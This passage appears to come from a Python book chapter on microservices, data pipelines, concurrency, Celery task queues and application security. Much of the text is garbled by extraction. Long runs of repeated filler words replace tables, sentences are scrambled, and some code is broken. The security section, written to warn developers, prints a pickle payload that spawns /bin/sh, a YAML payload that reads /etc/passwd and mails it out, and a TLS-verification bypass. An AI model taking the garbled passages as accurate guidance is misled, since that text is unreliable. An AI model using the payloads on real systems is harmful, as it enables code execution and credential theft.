Code refactor and reuse

Keeping these principles in mind, if we explore the Python software treasury, we find some web frameworks that facilitate the development of microservices, and some that do not:

not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not:

not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not:

not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not: not:

Table 9.2: Frameworks that favour Microservices

On the other hand, a framework like Django is not a very appropriate choice for a microservices-based application. It inculcates a very tight vertical component integration, does not possess the flexibility required for choosing the components, and has rigid configurations, among other features. These make it an easy-to-use framework, but not a viable option for microservices.

Why choose microservices?

The are several benefits of using microservices where applicable, compared to monolithic applications. The highlights include the following:

Better separation of concern: Microservices split the business logic of the application into separate well-defined units of service. Hence, cohesion is improved and the coupling between components decrease. Reduced initial design: You do not have to build the complete design upfront for the application. The design and architecture of the microservices can be easily refactored in an iterative fashion.

Well tested applications: Microservices facilitate better testing, since the components are smaller and isolated and can be individually verified for their functionalities.

Organisational structure improvements: For firms that use large and complex microservice structures, the teams can be created and managed around the microservices – and that would encourage specialization in a particular component as well as facilitate cross-functional roles. Such organisations are more agile in nature.

Centralization of data: Unlike the monolithic applications, every microservice can have its own data and underlying storage, rather than relying on a centrally located database.

Reliable CI/CD pipelines: With microservices, changes happen component wise and are easy to test as well. This can help achieve shorter automated release cycles and relatively fast deployments.

Pipe and filter architecture

The Pipe and Filter architecture is a simple technique to understand and implement, inspired by the UNIX shell command’s ability to redirect output of one command as input of the next using pipe separators. The pipes connect the consecutive nodes that act as filters for the data streams. For example, the number of words in a file can be retrieved by this sequence of commands in UNIX: $ cat filename | wc –w

The gstreamer multimedia processing library that supports various operations on audio and video files is a good example of how this architecture can be visualized. In Python, the multiprocessing module provides support for pipes as a means of communicating between different processes.

Pipes are basically parent and child connection pairs. Whatever is passed on at one end of the communication can be viewed at the other end and vice-versa.

This is especially useful in the data science space where custom ETL processes are generally processed as sequential steps and

designing such a model is quite simple and helpful, keeping this architecture in mind. This architecture finds common usage in data analytics, transformation of data, extraction of metainformation, and so on.

There can be multiple data sources, which are then connected to the filter nodes with the help of pipes. The filters are designed to house small isolated units of work that perform a specific operation on the data, and the results from one filter may be passed on as inputs to the next. The final processed data is then sent to a Data Sink for persistent storage.

Figure 9.7: Pipe and Filter Architecture For confined and smaller applications, the filter nodes can reside on the same machine – in which case the communication between the nodes happens with the help of shared memory buffers or actual UNIX pipes. In larger resource-intensive systems, the filters might need to reside on separate machines or cloud containers – in which case, the communication can take place through any kind of data channels including shared memory, sockets, or event queues. You can connect multiple filters to each other for performing complex data processing and staging.

Let us take the following simple example to see how the multiprocessing module implements the pipe and filter architecture:

import sys from multiprocessing import Process, Pipe

def read_file(fname, connection): """ Read from file and send to the connection """ connection.send(open(fname).read()) def count_words(connection): """ Count and print number of words in the connection data """ available_words = connection.recv() print('Available Words',len(available_words.split())) if __name__ == "__main__": parent_proc, child_proc = Pipe() # Create and Start Process 1

proc_one = Process( target=read_file, args=(sys.argv[1], child_proc) ) proc_one.start() # Create and Start Process 2 proc_two = Process( target=count_words,

args=(parent_proc,) ) proc_two.start() # Complete the processes proc_one.join() proc_two.join() When executed, this snippet will count the words in the file that is being read. However, the steps taken illustrate how the pipe and filter architecture is being used here: The two connections are setup and a pipe is created with them. The file read is the first filter that runs as a separate process, which takes in the file name as the input and sends out the read data to the connection.

The word count operation is the second filter, and is executed as a different process. This filter takes in the data read from the connection and counts the number of words before printing to the console.

In the preceding example, we have an explicit connection setup to play the part of the pipe. However, this may not always be needed. In Python, the generator objects can be chained effectively to create a pipeline to consume and process each other’s data and thereby create a data processing pipeline.

If we were to implement the example we used for multiprocessing earlier, but this time using generators (let’s add an additional filter to select files with a particular extension only), it would look like the following:

# Generator pipeline to filter files based on a type # and count words in them. import os def filter_files(all_files, file_extension): """ Filter the files stream to yield only some files """ for item in all_files: if item.endswith(file_extension): yield item def read_files(filenames): """ Yields (filename, data) for every file """ for fname in filenames: yield fname, open(fname).read()

def count_words(fdata): """ Yields number of words in the stream data """ for fname, data in fdata: yield fname, len(data.split())

if __name__ == "__main__":

# Chain the generators stream_one = filter_files(os.listdir('./'), '.py') stream_two = read_files(stream_one) stream_three = count_words(stream_two)

for data in stream_three: print(data) If I execute the preceding code, the following is returned: $ python3 test.py ('test.py', 292) ('descriptors.py', 154) Building simple or complex data processing pipelines is made possible by the chaining of generators (or co-routines) which connect the input and output of the generators consecutively.

Apart from these, there are several other techniques like connecting producer-consumer tasks using queues, by processes or threads to achieve the same pipelines. We might have seen examples of these in other relevant chapters of the book. You can also use Microservices for creating the simple data processing pipelines by redirecting the output of one to the input of another.

There are several third-party frameworks and packages in Python, that can be used to build data pipelines of varying complexity:

Although Celery is a task queuing mechanism, simple batch processing workflows can be created with limited support for setting up pipelines. It can chain up different tasks that can emulate a pipeline for a similar implementation.

Luigi can be used for setting up complex, long-running data processing batches that adhere to the pipe and filter architecture. It is bundled with Hadoop support that can also help scale up your data analysis pipelines.

API design pointers

With most young developers, as soon as you are given a problem statement, it is difficult to control the urge to start writing out code. Once a design is in place, our fingers, uncontrollably, want to start smashing the keyboard, implementing our ideas into code.

Remember that other developers will have to use the APIs we design. In this section, we will be looking at some of the design tips we have gathered over the years. You can apply them to any category of APIs, be it libraries, SDKs, modules, and even automation scripts:

Be explicit with API design: Make your APIs do what they say. If you name a function as it should return the user as a string – it should be expected to increment the counters or update databases. Using immutable data structures is also a great idea.

Give choice to the user: The usage of the API would differ from user to user. Some may want to pass arguments as lists, some as dictionaries, or simple strings. Some users may want synchronous while others may want async operations. Wherever possible, make your API versatile and allow users more options to adapt their use case.

However, too much choice can be paralysing for the user. Provide sensible defaults instead. Balancing the right amount of choice

with focused functionality is paramount:

Boiler plate code is bad: Whatever can be inferred and handled in the code, should be taken care of automatically. The user should not be burdened with providing every small detail. Avoiding boilerplate code keeps the API code clean and terse.

Minimize dependencies of the API: Self-contained code is the best code. There is always balance in deciding between whether to write re-usable code and tight coupling. It is better to split complicated functionality into smaller independent APIs. Define meaningful error states: Having well defined error codes to return on an application level helps to debug the situations better. Imagine asking your API to get_name() and you get a it provides no information. Having error codes like AppError.NO_RECORD_FOUND or AppError.DB_NOT_REACHABLE help to debug the issue way faster. Document, Document, Document: Yes, as enthusiastic as we are about writing the code, we are equally lazy about documenting it. It is boring, but essential. Great documentations take some time, effort, and sanity. From the high-level overview, to message protocols, sample code, and return values, they are all required as part of documenting your API. Adequate and focused documentation is an asset.

Write tests for sane APIs: Tests prove that APIs are working correctly. They are specifically helpful while refactoring your APIs in the future, making sure that you do not break existing functionality for the users who are already using your API. Documentations cannot capture all the essence of the API, and tests help cover the ground there. If documentation is the User Manual for the API, tests are like instruction set architecture reference. The design of your API matters. For people who like to simply hack things around, it encourages them to step back and look at the bigger picture. Even though all of these seem time consuming and tedious, in the end you will be a happier soul.

Scaling Python applications

Applications that process huge amounts of data can, over time, start to lag or perform sluggishly. This risks your test or production setup to be corrupted or broken, if not addressed. Scaling applications is a way to keep up with growing workloads, and there are ways in which we can make our Python applications scale, which we will be touching upon in this section.

Asynchronous programming in Python

Asynchronous techniques of programming refers to the main application thread outsourcing smaller units of work to run separately. Upon completion of the delegated task, the main thread is notified about the success or failure status of the thread running the sub-task. This technique enhances the responsiveness and performance of the application as it does not have to wait for something to be done:

Figure 9.8: Synchronous vs Asynchronous programming

The focus and traction around the usage of asynchronous techniques in the recent years attributes to its efficiency, despite it

being more complex than the traditional sequential execution programs.

Say, for example, your application is making some HTTP requests externally – the usual behaviour is to wait for the response and proceed with the next steps. If you choose to use asynchronous coroutines, the request can be submitted and the main thread can continue with other tasks while the response is awaited.

The primary reason why the Node.js tool gained popularity for the server side programming is the use of asynchronous constructs. Several high-throughput and IO intensive applications have external dependencies, like databases, REST endpoints, or file systems; hence, much of the code needs to handle sending requests and receiving responses. When any such resource is interacted with, the program execution simply waits around for the job to be done. If you use asynchronous programming, the code will now have the liberty to proceed with the other tasks, instead of waiting for the task to be completed.

Figure 9.9: Programming Models

Multiprocessing

The naïve way is to simply run multiple processes manually and the system can take care of scheduling resources like the CPU cores. However, to automate the large-scale tasks to run as multiple separate processes, the multiprocessing module helps with the spawning and management. The following is a simple example of the usage of this library:

from multiprocessing import Process def print_model(model='City'): print('Processing Honda Model: ', model)

if __name__ == "__main__": model_names = ['Civic', 'Jazz', 'Brio'] procs_list = [] process = Process(target=print_model) procs_list.append(process) process.start()

for model in model_names: process = Process( target=print_model, args=(model,) ) procs_list.append(process)

process.start()

for process in procs_list: process.join()

The result from running the preceding code would be like the following:

$ python ~/test.py ('Processing Honda Model: ', 'City') ('Processing Honda Model: ', 'Civic') ('Processing Honda Model: ', 'Jazz') ('Processing Honda Model: ', 'Brio')

Multithreading

Next up is multithreading – running multiple tasks at a single time on different threads. A thread, like a process, is a line of execution – the difference being that several threads can be spawned in a single process context and they share common resources. Hence, writing the code that uses threading is considerably more challenging. The OS does most of the tuning about sharing the CPU cores, when it comes to working with threads. However, you must remember the GIL (Global Interpreter Lock) in Python that restricts the Python threads from running on multiple cores. There, multi-threading in CPython is simply going to run the processes on the same core and share their execution time slots.

Using the threading module in Python, the following example illustrates a simple implementation of multi-threading:

import math import threading as td

def get_square(value): print("Square of input: {}".format( value * value))

def get_sqrt(value): print("Square root of input: {}".format(

math.sqrt(value)))

if __name__ == "__main__": thrd1 = td.Thread(target=get_sqrt, args=(100,)) thrd2 = td.Thread(target=get_square, args=(10,))

# Trigger first thread thrd1.start() # Trigger second thread

thrd2.start()

# Await execution of first thread thrd1.join() # Await execution of second thread thrd2.join()

print("Done!") The preceding code results in the following sequence of execution:

Square root of input: 10.0 Square of input: 100 Done!

Coroutines using yield

Fundamentally, a coroutine is nothing but a generalization of the well-known subroutines. It is a mechanism of cooperative multitasking, in which the process can relinquish control sometime or during the idle cycles, to a different section to enable multiple application components to run simultaneously.

Coroutines are built methods and slight is used. Generators coroutines can also

around generators, having some additional modifications around how the yield statement can help iterating over datasets, however consume data.

Generators produce data for iterations. Coroutines can consume data as well.

The following is an example of a simple multi-tasking operation with the help of coroutines:

def print_model(model): print("Honda is launching models: {}".format(model)) try : while True: # Using yield to create coroutines

car_model = (yield) if model in car_model: print(car_model)

except GeneratorExit: print("Terminating Coroutine!!")

coroutines = print_model("Civic") coroutines.__next__() coroutines.send("Civic CVT 1.5D") coroutines.send("Civic Turbo") coroutines.send("Mobilio")

coroutines.close() The result of the preceding code upon execution would be as follows: Honda is launching: Civic Civic CVT 1.5D Civic Turbo Terminating Coroutine!!

The asyncio module in Python

The other method of simultaneous execution is asynchronous programming, which takes the Operating System out of the picture. From that perspective, we will have a single process with a single thread, but we will still be able to achieve multiple tasks at once. So, what is happening under the hood? Asyncio is the answer here.

Since Python 3.4+, the dedicated asyncio module was introduced, which is designed to make asynchronous code simpler to write and understand, with the help of futures, event loops, and coroutines. It does not work with callbacks as its counterparts in other languages.

languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages.

languages. languages. languages. languages. languages. languages.

languages. languages. languages. languages. languages. languages.

languages. languages. languages. languages. languages. languages.

languages. languages. languages. languages. languages. languages.

languages. languages. languages. languages. languages. languages.

languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages. languages.

languages. languages. languages. languages. languages. languages. languages. languages.

To simply explain, the usage of the code can be structured by defining your individual tasks in the form of coroutines, and then you can schedule them as per convenience (which can even be simultaneously). Within the coroutines are defined the yield points, where a context switch can occur when there are other tasks to cover. Nothing happens if there are no other tasks left.

When we talk about context switches in asyncio, it refers to the event loop transferring the flow of control from one coroutine to another.

Let us see this in action with the help of an example. We have defined three tasks that run asynchronously for fetching the information on top five entries from reddit feeds, extracting and writing the JSON data to the console. We will be making use of the aiohttp which is a library that ensures that HTTP requests are handled in an asynchronous fashion. import aiohttp import asyncio import json import signal import sys BASE_URL = 'https://www.reddit.com/r/{}/top.json? sort=top&t=day&limit=5'

event_loop = asyncio.get_event_loop() clnt_session = aiohttp.ClientSession(loop=event_loop) async def retrieve_json(client, url): async with client.get(url) as resp: assert resp.status == 200 return await resp.read() async def get_feed_data(feed_topic, client): fetched_data = await retrieve_json( client, BASE_URL.format(feed_topic)) json_data = json.loads( fetched_data.decode('utf-8')) for fieldInfo in json_data['data']['children']: link = fieldInfo['data']['url'] title = fieldInfo['data']['title'] score = fieldInfo['data']['score'] print("{}: {} ({})".format( str(score), title, link))

print('COMPLETED PROCESSING FOR:{} \n'.format(feed_topic)) def handle_signal(signal, frame): event_loop.stop() clnt_session.close() sys.exit(0) # Configure the trigger signal

signal.signal(signal.SIGINT, handle_signal) asyncio.ensure_future(get_feed_data('rust', clnt_session)) asyncio.ensure_future(get_feed_data('flask', clnt_session)) asyncio.ensure_future(get_feed_data('einstein', clnt_session)) event_loop.run_forever()

Distributed processing using Redis Queue (RQ)

This is an alternative technique for the oldies out there. If you or your organisation are still working with the older versions of Python, then using asyncio and aiohttp may not always be a viable option. Even in the case of systems where you would want to run your tasks across different machines, the simple out-of-thebox Python tools may not be possible. In all such scenarios, we fall back to using something like RQ It is a simple in-memory solution in Python that is used for maintaining job queues, and then processing them using multiple workers in the background. Note that this library is built on top of the Redis in-memory database for key/value storage.

Again, let us see the usage of this with the help of a basic function we have defined using Redis:

####### word_processor.py ####### import requests

def get_word_count(remote_url): """ Basic Function Implementation """ response = requests.get(remote_url) # Compute the number of words num_words = len(response.text.split()) print(num_words)

return(num_words)

####### main.py ####### from word_processor import get_word_count from redis import Redis from rq import Queue

my_queue = Queue(connection=Redis()) job = my_queue.enqueue(get_word_count,

'http://www.rajthoughts.com')

Scaling Python web applications – message and task queues

Up until now, we have been discussing about scaling up – that is, how do we improve the scalability within the confines of the host server or one machine. Most of the practical real world applications that you would work on a day-to-day basis are built to run across machines, i.e. they scale out with increasing users, load, or capacity. This is how scalability is tackled for most web applications. There are several techniques deployed in order to scale an application out – including designing specific communications and workflows, creating redundancy for failovers, scaling horizontally, scaling compute resources, or making use of different protocols. However, unless you are designing products from scratch, these areas are quite a lengthy discussion to be had – which is beyond the scope of this book. Here, we will be talking about the most useful, popular ways of scaling the production workflows – which are message queues and task queues.

Reducing coupling between systems helps to scale them well. Keeping the two systems tightly coupled does not allow them to scale beyond a certain limit.

Say, for example, you cram all your data and business logic into one single function – it would be quite difficult for you to leverage the full power of the available resources like multiple CPU cores. It has been observed that if you restructure the same program using one of the asynchronous techniques discussed earlier, and use a queue to pass messages, it indeed scales well.

The web application systems can also be scaled well if you can decouple them. The REST APIs are examples of one such scalable architecture, where the HTTP servers and endpoints can be scaled across multiple regions and data centers across the globe.

The purpose of the message queue is to decouple the communication between the different dependent applications by being a broker for the messages. They make use of Queueing Protocols to communicate, despite residing on different host servers.

A message queue, is a larger version of the multi-threaded synchronized queue, where the threads are replaced by the individual machines, and the in-process queue is replaced by a distributed shared queue.

The sender and receiver application communicate by writing and reading chunks of data onto the queue, known as messages. Some of the common message queues come with their storage

and communication semantics, where the message is persisted in the queue until the receiver application reads and processes it. A schematic model of the components and communications in a message queue would look something like the following:

Figure 9.10: Schematic model of a distributed message queue

A common standard of message queue also referred to as Message-Oriented Middleware is the AMQP or Advanced Message Queueing which ensures that the attributes of such a system are guaranteed – including queueing, security, routing messages, and reliable message delivery.

The financial industry has been the originator and primary propagator, given that security of information and reliable delivery of data are of paramount importance. Several AMQP implementations exist in the open source software world. RabbitMQ, Apache Qpid, and ZeroMQ are some such implementations.

RabbitMQ is quite popular at the time of writing of this book – it is a middleware written in Erlang. It supports APIs and adapters in several languages, including Python. RabbitMQ message’s delivery is facilitated with the help of exchanges and uses routing keys to identify the unique queues for delivering the messages. In the following section, we will be looking into a more specialized middleware in Python – Celery – a flexible and distributed queue system that is highly focused on real time production applications.

Celery – a distributed task queue

Celery is a distributed task queue created in Python. Single units of execution in celery are referred to as tasks – which can be run in a parallel manner on one or more machines in the network using the worker processes. The default technique for achieving this in celery is multi-processing, but it also allows you to configure a custom backend.

You can execute the tasks in synchronized or asynchronized manner and the output is available in the form of a future – object in most cases. You can also connect it to databases, files, or in-memory redis caches and the output from the task can be directly written to these.

Compared to other message queues, units of data are not simply messages – rather it is an executable task, referred to as callables in Python.

You can interface Celery to work with the different message brokers – the out-of-the-box broker is RabbitMQ. You can also configure it to use a Redis in-memory cache as the broker backend.

So, when should you use celery? Celery is useful in scaling a task over multiple worker nodes located on several host machines; it is a good fit for scaling computationally intensive tasks. It can receive messages from queues and send them across to machines in a distributed cluster, thereby achieving horizontal scalability. An example of this would be an email delivery infrastructure. It can also perform parallel computations by simply dividing the data into multiple segments and applying a compute function on it.

Let us look at how and when to use celery, with the help of some practical examples and guides.

A celery example

The most common use case for celery that I have come across in my experience so far is Email Delivery Systems. Let us write a quick example in Python to see how such a system can be written using Django as the web application framework:

from from from from

django.conf import settings django.core.mail import send_mail django.template import Engine, Context .celery import app as celery_application

def render_from_template(template, context): eng = Engine.get_default() tmpl = eng.get_template(template) return tmpl.render(Context(context))

@celery_application.task def task_send_mail(to_list, subject, mail_templ, context): msg = render_from_template(f '{mail_tmpl}.txt', context) msg_html = render_from_template(f '{mail_templ}.html', context) send_mail( from_email=settings.DEFAULT_FROM_EMAIL, recipient_list=to_list, subject=subject, message=msg, html_message=msg_html,

fail_silently=False, )

In the preceding snippet, the usage of celery to deliver the mail will help reduce the response time of the application, since the sending method is decoupled from the main code for proving a response back in the form of a celery task. You can use the delay method of the celery app to invoke this.

task_send_mail.delay(…)

The celery app can also help with something like automated retrying upon failure.

@celery_app.task(bind=True, default_retry_delay=2 * 60) def task_send_mail(to_list, subject, mail_templ, context): … try: send_mail( … … ) except smtplib.SMTPException as ex: self.retry(exc=ex) With the preceding change, if the email could not be sent, the program will wait for two minutes and retry sending the mail. The retry count is also configurable.

Running scheduled tasks with Celery

You can use celery to schedule tasks to be run with crontabs in Linux. To achieve this functionality, the celery worker on the machine needs to be executed with the --beat flag, without which the scheduler will simply be ignored by celery. We can then configure the task to be executed and the time at which it should be triggered – the config file would look something like the following: from datetime import timedelta from celery.schedules import crontab CELERY_BEAT_SCHEDULE = { 'EOD-stats-summary': { 'task': 'proj_name.data.scripts.send_eod_stats', 'schedule': crontab( minute='*/30', hour='1, 3, 8-20, 22' ), }, 'quota-usage-notify': { 'task': 'proj_name.utils.scripts.notify_quota_usage', 'schedule': timedelta(minutes=6), } }

Note that this configuration is specific to the application we are building with Django. If you are using a different framework, you can also define a generic configuration in the celery app config itself, using the following:

celery_application.conf.beat_schedule = …

It also supports the addition of arguments to the tasks and provides the ability to schedule the same task with multiple arguments. You can provide fixed times or simply use the syntax that you use with a cronjob.

Ability to postpone task execution

Celery queue tasks can be configured to run after a fixed delay period or timeout. This is particularly useful in scenarios where you want a delayed response to an action that just took place. This is achieved with the help of the apply_async function, providing it with an eta or countdown parameter.

Provides the exact time at which to trigger the task. Provides after how many seconds to trigger the task.

Using it in your configuration code would look something like the following:

task_func.apply_async( # Arguments to Task ((param1, param2, … , paramN),

# Trigger after 10 minutes countdown=10 * 60 )

Set up multiple Celery queues

If your application works in a distributed environment, you will have several workers running on different machines – however, you would usually share a single message queue.

However, additional queues can be setup for the tasks or workers that need more performance. Consider the example of sending emails that we discussed earlier – we do not want our emails to be hindered by the other tasks in the queue. Hence, a dedicated queue can be setup for handling only the emails (say,

CELERY_TASK_ROUTES = { 'project_name.utils.mail.task_send_mail': {'queue': 'mail_q'}, }

For the non-Django projects, you can specify the queue directly in the configuration of the application, using the following:

celery_application.conf.task_routes = …

Then, we can bring up two different workers, using two different queues as shown in the following way: celery -A project_name worker -l info -Q celery celery -A project_name worker -l info -Q mail_q

If we run the worker without the –Q argument, then that worker will be used for all other non-email queues.

Long running tasks with Celery

In the data science domain, sometimes we write and run processes that churn terabytes of data to generate analytical stats. With the growing data sets, the runtimes of these programs keep increasing. The recommended way of writing such tasks is to process the data in chunks. We can introduce a limit and offset parameter in the tasks to define the chunk size to be used per task. @celery_application.task def send_email_task(offset=0, limit=100): recipient_batch = Recipints.objects .filter(is_active=True) .order_by('id')[offset:offset + limit]

for recipient in recipients: send_email(recipient)

if len(recipients) >= limit: send_email_task.delay(offset + limit, limit)

This trivial example illustrates how the limit and offset scan be used. When a task completes for a chunk of recipients, we check if there are more recipients available and the task is triggered again with an updated offset. Otherwise, the last chunk has been

encountered and the task terminates. This does assume that the ordering of the data is fixed during the execution.

Application security

Security architecture

When we talk about application security, we refer to software that implements a proper access control mechanism, allowing only authorized users to view and manage the data and APIs, while keeping out malicious attempts for access by unauthorized users. The widely accepted paradigm for creating any kind of system implementing information security include the following principles:

Confidentiality: This makes sure that the information or the critical data is not accessed or modified by unauthorized users. This is typically achieved with a set of rules and procedures that enable access and keep track of the application users.

Integrity: Integrity is about ensuring that the system is not susceptible to external influences or manipulations. It ensures that the data across all components and channels is reliable and trustworthy.

Availability: This ensures that for all the valid and authorized users, the SLA for the system is honoured and no one is denied access to the services when needed. The preceding components are referred to, commonly, as the CIA triad, and they constitute the foundations of a secure architecture design of a system. These are usually coupled with a few of the following additional traits that need to be kept in mind:

Authentication: The likes of digital signatures and public keys ensure that the identities of users are validated. It makes sure that the people are actually who they say they are.

Authorization: What is a valid user allowed to do? Authorization ensures that the different users can be provided the different roles in an application; for example, read and write users in a database.

Non-reputability: This ensures accountability of transactions. When a user performs an action, they cannot deny it later. For example, emails sent and bank transactions, once done cannot be denied.

Figure 9.11: The CIA triad of application security

Common vulnerabilities

It is not easy to write secure code. When we are taught how to code in a programming language, the instinct is to think how the clients want to use the program or software. When designing secure applications, the direction should be to think of how it could be misused and broken by the users. The same applies to Python applications – in fact, there are several such cases of vulnerable code in the Python standard library. However, many developers are not aware. In this section, we will be looking at some of the most common kinks in Python code that can make your applications vulnerable.

Assert statements in production code

Sometimes the developers use assert statements as a means to check and prevent the users from accessing a section of the code. That is not just a sub-optimal practice, but also a security flaw. Consider the following example:

def do_something_important(request, loginname): assert loginname.is_admin, "You are unauthorized!" # sensitive code… When you run this in a shell, the default behaviour of Python is to run the program with the __debug__ set as However, when we deploy an application onto a production environment, we want to squeeze out some additional performance using optimizations. This will cause the assert statement to not be executed at all, and any logged in user, regardless of whether they are admin or not, will be able to access the code.

Only use assert statements to communicate with the other developers, such as in the unit tests or to warn against the incorrect API usage, never for access control.

Timing attacks

How can something as simple as comparing two strings be vulnerable? Let us see. The code to compare the strings would be equivalent to the following:

def equals(string_one, string_two): # Size Check if len(string_one) != len(string_one): return False # Character Wise Check for char_one, char_two in zip(string_one, string_two): if char_one != char_two: return False return True

We perform a character wise comparison until the first point of difference is identified. Depending upon how long our strings are, the time taken will linearly increase.

Now, think about authenticating the secret keys over a network using comparison techniques. In such scenarios, other than the comparison time itself, the network jitter also plays a big role. Timing attacks are what we refer to the situations where the attacker can access or control the values that are compared to the secret.

For example, in the case of an authorization key, if the attacker finds out that the first character in the key is then they can start sending the keys beginning with d to get an idea of the next character. They can assess the time it takes for each comparison, and the one that takes more time to get rejected is a closer match since the comparator might have moved on to the next character before failing. Isn’t that something you missed?

In order to avoid timing attacks, a very obvious solution is to use string comparison techniques that are not dependent on the length of the strings. Such algorithms are referred to as constant time string

Today, there are several built-in functions available for alternative comparisons depending upon the environment you are using. For example, the Python standard library in Python 3.3+ comes with the hmac.compare_digest function that uses the keyed-hashing for this purpose. If you are using Django, you can rely on the constant_time_compare function it provides.

XML parsing

Most of the applications I have seen in scaled up organisations are built in a rapid manner, and therefore rely on a lot of standard modules and libraries. Chances are that if you use the standard XML Python modules for loading and parsing XML data, your application is susceptible to a few attacks through XML. The most common attacks include Denial of Service for crashing the client systems. Especially, if your application is parsing external, untrusted XML files, it increases the odds. A very common example of such an attack, which we used in our younger years as pranks or just to sound cool, was called the billion laughs. It hides about a billion LoLs as a payload in a few lines of XML code using referential entities. When your XML parsers try to read this seemingly harmless file into memory, it will end up consuming several GBs of RAM. Try it out for yourself.

Figure 9.12: Billion Laughs XML Bomb

The fun thing is that Microsoft’s Word, which was being used to draft this content, is XML based, so when trying to paste the code from a text editor to Word, it shoots up the memory usage and crashes, since it tries to parse it, hence the preceding screenshot.

Another common attack on XML parsers would be referencing the entities from the external URLs. This leaves your application vulnerable to attackers who can send across malicious content to be executed when you try to parse the XML code, if you are connecting to untrusted IP addresses.

The problem also sometimes arises when we depend on external, third party libraries that are not very robustly implemented, leaving your application vulnerable without any mistake of yours. The Python standard library has a collection of modules like etree, xmlrpc, DOM, and so on, which at some level are still susceptible to types of XML attacks. Even the official Python documentation keeps a record of such vulnerabilities, at the following link: https://docs.python.org/3/library/xml.html#xml-vulnerabilities

A safer option is to use defusedxml as an alternative to the standard library modules. It adds safe-guards against most of these types of attacks.

A polluted site-packages or import path

You can import anything anywhere – Python provides a ton of flexibility to its import system. It gives a tremendous advantage when you are just cooking up some scripts or monkey-patches for automation or testing. However, the same feature can also prove to be one of the major security holes in Python.

Most of us install and rely upon the third-party packages into our local deployments or virtual environments, which exposes us to security vulnerabilities in those packages. There have been several instances of packages being published to PyPi that have similar names as some of the popular packages. Developers can mistake the package names and install the ones that have malicious code in them. For example, there are packages with names like and so on which maybe similar sounding and can easily confuse the user.

Dependencies of packages being installed can also introduce vulnerabilities that override the default behaviour in Python using the import mechanism.

Try to vet 3rd-party packages. The features and security services of PyUp.io can be useful. It is recommended to use virtual environments for production applications, so that global sitepackages remain pristine. Do check the package signatures.

Pickle mess-ups

Python pickle file can store any object in a serialized manner. Deserializing them is as risky a behaviour as XML or YAML. One such vulnerability arises, when we pickle classes that define a __reduce__ magic method returning a string, or a callable within a tuple. Attackers can use such syntax to introduce malicious code using the subprocess modules to run arbitrary commands on the target machine. Consider the following example for the pickling code, that runs a shell command: import base64 import pickle import subprocess

class ExecuteBinSh(object): def __reduce__(self ): return (subprocess.Popen, (('/bin/sh',),))

print base64.b64encode(pickle.dumps(ExecuteBinSh()))

Only unpickle data from sources you trust or authenticate. Alternatively, you can use a different serialization pattern like JSON.

Using yaml.load safely

The PyYAML library documentation already included a warning message for the users regarding its vulnerabilities. It goes like the following:

“Warning: It is not safe to call yaml.load with any data received from an untrusted source. yaml.load is as powerful as pickle.load and so may call any Python function.”

For example, the Ansible module of Python, which illustrates how one can give the Ansible Vault a valid YAML as an input value. The value when called with os.system() can run on the host.

!!python/object/apply:os.system ["cat /etc/passwd | mail

This can effectively steal local sensitive information and send it to the attacker. Hence, if you are loading user-specified YAML configs, you are exposed to malicious attacks.

The recommendation is to use yaml.safe_load, in most cases, unless important, as it provides built-in support to defend against

such attacks.

Handle requests safely

Most of the common applications that my team works on use the requests module to interact or fetch content from the remote HTTP endpoints. It is a wonderful tool, which also has support for verifying the SSL certificates for you.

The requests module uses certifi to ensure that the certificate authorities are reliable and trustworthy. Hence, you should always try to secure your remote connections by keeping the latest version of the certifi dependency.

However, with all the advantages it provides, it also makes it possible to bypass SSL validations if the user does not want it. The default behaviour, however, is to verify the certificate. When reviewing code, ensure that developers do not explicitly violate this rule, unless otherwise the source is internal or completely trusted.

Bypassing the verification of SSL certificates can be simply achieved with a single argument value:

requests.get("https://www.sonalraj.com", verify=False)

Using bandit for vulnerability assessment

Over the years of developing Python infrastructures, we have started trusting the bandit library to scan our codebase for vulnerabilities. Bandit is an open-source project and is available for installation through PyPi.

The bandit module will create an AST Syntax for each Python file that it scans in the project, then, add several different plugins against this AST to detect whether there are any usual security issues in the software. For example, it includes plugins that can figure out if you have forgotten to remove the debug=True flag from your Flask application.

You can manually run Bandit against your code, or choose to integrate it with git-hooks for your repository or even include it as a component or step in your CI/CD pipeline for assessment of code before deployment to the test or production environments. The setup involves creation of a YAML configuration file in which we can define and control how bandit handles or acts in different situations. It also provides an option to skip certain tests if you want a relaxed check for your codebase. Despite its vast number of plugins that are run against the code, there is still a limit to how much guarantee bandit provides for a vulnerability free code. There could still be potential issues that is not identified by any of bandit’s plugins. However, adding it your

code quality assessment tasks does get most of the job done in an easy way.

Other Python tools for vulnerability assessment

Code Python code is relatively quite secure. However, one should be considerably sceptical of it. Even the way multiple people in the firm contribute to the development of an application can introduce unwarranted security issues. Hence, having a security scanner helps to find the vulnerabilities in the code, if any. Several online security scanners are available for online threat assessment. However, for platform dependent weaknesses in Python, we need more tools that are specialized. In this section, we summarize some of the effective tools we have evaluated and used over the years, in the following table:

table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table:

table: table: table: table: table:

table: table: table: table: table:

table: table: table: table: table:

table: table: table: table: table:

table: table: table: table: table:

table: table: table: table: table:

table: table: table: table: table:

table: table: table: table:

table: table: table: table:

table: table: table: table: table:

table: table: table: table: table:

table: table: table: table: table:

table: table: table: table:

table: table: table: table:

table: table: table: table:

table: table: table: table:

table: table: table: table:

table: table: table: table:

table: table: table: table:

table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table: table:

Table 9.3: Common Vulnerability assessment tools in Python

Python coding security strategies

